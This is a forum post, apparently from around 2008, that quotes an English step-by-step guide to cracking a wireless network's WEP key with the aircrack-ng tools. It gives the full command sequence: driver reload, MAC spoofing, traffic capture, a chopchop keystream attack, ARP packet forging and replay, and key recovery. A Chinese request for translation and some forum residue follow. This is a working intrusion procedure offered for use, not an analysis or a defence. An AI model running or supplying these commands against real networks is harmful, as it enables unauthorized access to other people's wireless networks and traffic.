|
We will also need to know the target's name (ESSID), MAC address, and the channel. Please note that my wireless device is "eth1" but yours may be different; use "iwconfig" to find out which adaptor is wireless. (If you downloaded aircrack-ng you may need to reset your network adaptor)
iwlist eth1 scan Now we can get started. First we must enable rtap0 for listening. rtap0 is required (instead of just eth1) due to limitations in the ipw2200 driver.
rmmod ipw2200
modprobe ipw2200 rtap_iface=1 Next enable wireless and change MAC (changing MAC is optional).
ifconfig eth1 up hw ether 00:11:22:33:44:55 Configure wireless w/ essid, channel, and a fake key.
iwconfig eth1 essid <ESSID> channel <#> key s:fakekey mode managed Now start collecting traffic on rtap0. "dump" is the name of the capture (.cap) file.
airodump-ng --bssid <AP MAC> -w dump rtap0 Now for the actual injection. Open a new terminal (<ctrl><alt><F2> if you are still in the console) and start the aireplay chopchop attack. Note the modifier "-i rtap0." This tells aireplay to use rtap0 for listening and eth1 for injecting. Also "-4" is the type of attack (chopchop).
aireplay-ng -4 -a <AP MAC> -h 00:11:22:33:44:55 -i rtap0 eth1 A prompt will ask you to use "this" packet. Type "y" and the attack should continue. Once it finishes you will have a plaintext (.cap) file and a keystream(.xor) file. The keystream file will look something like "replay_dec-######.xor" Make sure there are no errors reported after using aireplay. This is where I had the most difficulty. If the attack doesn't start after selecting the packet, you might not be close enough to the AP or the AP is not vulnerable to the chopchop attack. I also received an error stating the checksum didn't match. I just re-ran aireplay and it was fine. Now we will create an arp-request packet using the aquired keysteam file. The "-l" and "-k" options are the source IP and destination IP. They can be any valid IP. The destination can be the gateway (router IP) but the attack run faster if it is an arbitrary IP.
packetforge-ng -0 -a <AP MAC> -h 00:11:22:33:44:55 -k 192.168.1.100 -l 192.168.1.101 -y replay_dec-####.xor -w arp-request Finally we will send our newly created arp-request packet over and over. After this step you should see the "Data" begin to rise quickly back in the first terminal (airodump). If the data doesn't change (usually between 80 and 350 per second) then something is wrong.
aireplay-ng -2 -r arp-request eth1 Let aireplay run for a few minutes while you collect data. After 75,000 or so you can run aircrack in a third terminal (<ctrl><alt><F3>). Within a few minutes you should have the key.
aircrack-ng -z dump*.cap 谁把关键部分翻页一下,谢谢 | 
IP卡
狗仔卡
发表于 2008-5-19 21:58
显身卡
